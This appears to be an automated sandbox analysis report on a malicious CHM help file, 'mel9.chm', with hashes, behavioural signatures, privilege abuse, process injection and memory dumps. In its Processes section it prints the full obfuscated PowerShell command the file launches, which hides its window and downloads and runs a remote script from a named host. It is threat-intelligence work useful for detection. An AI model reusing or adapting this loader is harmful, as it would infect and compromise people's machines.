Analysis
-
max time kernel
45s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
08-12-2022 08:13
Static task
static1
Behavioral task
behavioral1
Sample
mel9.chm
Resource
win7-20220812-en
windows7-x64
6 signatures
300 seconds
Behavioral task
behavioral2
Sample
mel9.chm
Resource
win10v2004-20220901-en
windows10-2004-x64
14 signatures
300 seconds
General
-
Target
mel9.chm
-
Size
13KB
-
MD5
e7a3bc55f52eebb6ce7df0a0047fec40
-
SHA1
b152e0d6abc8dab4500aaa4161dac968e54cad20
-
SHA256
908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8
-
SHA512
3537fee98df7a02510e65c4a7fbe302e154d37e5ea497fe2677936f3442afc565a4a6307a870971ca3f45a8d25bee50b71a04c515664737cbe72d4031a186a81
-
SSDEEP
192:8FYhJztroZ7rRXcAU9aoSpW9KZYtsufMCKv6:gYjtroZ7rAv9yYtsuFKv
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://cricot2.kylos.pl/mel9.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 1360 powershell.exe 6 1360 powershell.exe -
Processes:
hh.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1360 powershell.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1360 powershell.exe Token: SeIncreaseQuotaPrivilege 1360 powershell.exe Token: SeSecurityPrivilege 1360 powershell.exe Token: SeTakeOwnershipPrivilege 1360 powershell.exe Token: SeLoadDriverPrivilege 1360 powershell.exe Token: SeSystemProfilePrivilege 1360 powershell.exe Token: SeSystemtimePrivilege 1360 powershell.exe Token: SeProfSingleProcessPrivilege 1360 powershell.exe Token: SeIncBasePriorityPrivilege 1360 powershell.exe Token: SeCreatePagefilePrivilege 1360 powershell.exe Token: SeBackupPrivilege 1360 powershell.exe Token: SeRestorePrivilege 1360 powershell.exe Token: SeShutdownPrivilege 1360 powershell.exe Token: SeDebugPrivilege 1360 powershell.exe Token: SeSystemEnvironmentPrivilege 1360 powershell.exe Token: SeRemoteShutdownPrivilege 1360 powershell.exe Token: SeUndockPrivilege 1360 powershell.exe Token: SeManageVolumePrivilege 1360 powershell.exe Token: 33 1360 powershell.exe Token: 34 1360 powershell.exe Token: 35 1360 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 2004 hh.exe 2004 hh.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
hh.exedescription pid process target process PID 2004 wrote to memory of 1360 2004 hh.exe powershell.exe PID 2004 wrote to memory of 1360 2004 hh.exe powershell.exe PID 2004 wrote to memory of 1360 2004 hh.exe powershell.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://cricot2.kylos.pl/mel9.txt')|P2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1360-55-0x0000000000000000-mapping.dmp
-
memory/1360-57-0x000007FEEF550000-0x000007FEEFF73000-memory.dmpFilesize
10.1MB
-
memory/1360-58-0x000007FEEE9F0000-0x000007FEEF54D000-memory.dmpFilesize
11.4MB
-
memory/1360-60-0x0000000002694000-0x0000000002697000-memory.dmpFilesize
12KB
-
memory/1360-59-0x000000001B700000-0x000000001B9FF000-memory.dmpFilesize
3.0MB
-
memory/1360-61-0x000000000269B000-0x00000000026BA000-memory.dmpFilesize
124KB
-
memory/1360-62-0x0000000002694000-0x0000000002697000-memory.dmpFilesize
12KB
-
memory/1360-63-0x000000000269B000-0x00000000026BA000-memory.dmpFilesize
124KB
-
memory/2004-54-0x000007FEFC1B1000-0x000007FEFC1B3000-memory.dmpFilesize
8KB